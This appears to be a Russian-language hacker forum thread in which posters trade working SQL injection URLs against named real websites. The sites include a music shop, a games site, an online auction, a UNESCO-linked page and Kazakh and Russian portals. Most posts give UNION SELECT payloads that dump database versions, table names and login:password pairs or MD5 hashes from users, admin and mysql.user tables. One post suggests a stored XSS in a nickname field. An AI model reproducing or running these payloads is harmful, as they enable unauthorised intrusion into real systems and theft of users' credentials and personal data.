SQL Инъекции

Code:

http://www.sequelvc.com/index.php?page=news&id=843+union+select+concat(database(),0x3a,version()),2/*

Code:

http://www.vingarbutt.com/index.php?page=news&more=1&id=-69+union+select+1,2,3,4,5,6,7,email,9,10+from+users+limit+5/*

Code:

http://www.iratiwanti.org/iratiwanti.php3?page=news&id=-242+union+select+1,2,3,4,5,6,7,8,9/*

 

У меня все выводиться

лимитом перебираем таблицы, подом колонки получаем базу.
управление:Opera 9.10

 

Constantine, а из таблицы admin почему тогда данные не выводятся? Таблица присутствует:

Code:

http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12%20+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Так что извиняй, это не то что хотелось бы. Дело в том, что даже простое обращение типа вот этого:

Code:

http://www.marycoughlanmusic.com/shop.php?id=-47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*

Уже не работает!

 

Опять времени много =)

Цель - www.gamesplay.ru

Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...

Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!

Подбираем стотлбцы и зануляем запрос.

Теперь пробуем вывести чуток данных из таблицы.

Облом, други! Но мы то с вами не так себе, прорвемся!

Теперь все ок. Ну а дальше...

Итак, финал!

login : md5(pass) : mail : icq

PS Пользователей не считал, но очень много =)

 

www.generationsims2.com

фанатам Sims 2 посвящаеться:

Code:

http://www.generationsims2.com/news_com.php?idnews=-1+union+select+1,concat(user_id,0x3a,user_password),3,4,5+from+phpbb_users/*

 

самара =\

 

Code:

http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,database(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,version(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,user(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+union+select+1,password,3,4,5,6,7,8,9+from+mysql.user/*

 

Code:

http://www.elementemag.com/detail.php?page=news&id=14+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+mysql.user+limit+2/*

 

считать их не надо они вычисляются тем же самым limit'ом,юзеров 13549

 

Code:

http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

мертвая скуля...

 

в каком плане мертвая? вроде выводит все

Code:

http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*

 

я там ни одной таблицы не нашел...

 

Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть

Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю

 

просто база другая

Code:

http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8,9,10,11,12+from+shoutout_marycoughlan_db.users/*

2maxster
как вариант можно предложить активную xss в поле ника, создаешь фотку и в поле ника пишешь код.
пример:

Code:

http://z04.kazantipa.net/index.php?m0=8&m1=1

 

Code:

http://www.sinotruck.ru/index.php?t=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17/*

Code:

http://www.musagetes.kz/konkurs/text_more.php?cid=5&tid=-1+union+select+1,2,3,concat(user(),char(58),version()),5,6,7/*

 

www.npstoik.ru


«Современные Технологии
в Образовании и Культуре» :

Code:

http://www.npstoik.ru/vio/inside.php?ind=news2&key_news=-87+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5/*

 

www.prom.kz (Каталог предприятий)

Code:

http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19,20+from+bx_prom_user+limit+2,1/*
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.TABLES+limit+34,1/*

 

http://lotok.com.ua
интернет-аукцион
таблицы: (99 шт.)

Code:

http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+36,1/*

таблица юзеров #1

Code:

http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(login,0x3a,password,0x3a,email)+from+ppusers+limit+0,1/*

#2

Code:

http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_users/*

админ:

Code:

http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_admins/*

все пароли в MD5, пока не расшифровал)
Аукцион мб не особо крупный, но инфы в таблицах очень много.

 

Вот собсна.. раскручена полностью. думаю вполне даже паблик)

так же есть таблица users

 

Центр маркетингово-аналитических исследований

Code:

http://www.cmar.kz/index.php?id=15&PageLevelID=-154+union+select+user+from+mysql.user

таблица (password) есть но не выводится

Code:

http://www.women.unesco.kz/base.php?id=-4+union+select+concat(login,0x3a,pwd)+from+users+limit+4,1/*

пассы в чистом виде